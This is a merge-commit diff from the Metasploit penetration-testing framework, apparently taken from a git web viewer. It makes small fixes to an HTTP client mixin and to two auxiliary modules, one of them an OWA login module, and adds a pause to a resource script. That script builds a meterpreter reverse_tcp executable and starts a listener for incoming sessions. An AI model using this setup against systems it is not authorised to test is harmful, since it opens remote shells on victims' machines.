Merge remote-tracking branch 'upstream/master'
commit
e0ba903cd2
|
@ -366,7 +366,7 @@ module Exploit::Remote::HttpClient
|
|||
print_line('#' * 20)
|
||||
print_line(res.to_s)
|
||||
end
|
||||
|
||||
disconnect(c)
|
||||
res
|
||||
rescue ::Errno::EPIPE, ::Timeout::Error => e
|
||||
print_line(e.message) if datastore['HttpTrace']
|
||||
|
|
|
@ -61,6 +61,7 @@ class MetasploitModule < Msf::Auxiliary
|
|||
'method' => 'GET'
|
||||
})
|
||||
print_good("#{rhost}:#{rport} - Server is responsive...")
|
||||
return 1
|
||||
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError, ::Errno::EPIPE
|
||||
return
|
||||
end
|
||||
|
|
|
@ -195,7 +195,7 @@ class MetasploitModule < Msf::Auxiliary
|
|||
|
||||
if not res
|
||||
print_error("#{msg} HTTP Connection Error, Aborting")
|
||||
return :abort
|
||||
return
|
||||
end
|
||||
|
||||
if action.name != "OWA_2013" and res.get_cookies.empty?
|
||||
|
|
|
@ -13,6 +13,10 @@ def out_path
|
|||
"#{Msf::Config::local_directory}/meterpreter_reverse_tcp.exe"
|
||||
end
|
||||
|
||||
# Please see:
|
||||
# https://github.com/rapid7/metasploit-framework/issues/7603
|
||||
sleep(1)
|
||||
|
||||
run_single("use payload/#{PAYLOAD}")
|
||||
run_single("set lhost #{payload_lhost}")
|
||||
run_single("set lport #{payload_lport}")
|
||||
|
@ -25,4 +29,4 @@ run_single("set lhost #{payload_lhost}")
|
|||
run_single("set lport #{payload_lport}")
|
||||
run_single('set exitonsession false')
|
||||
run_single('run -j')
|
||||
</ruby>
|
||||
</ruby>
|
||||
|
|
Loading…
Reference in New Issue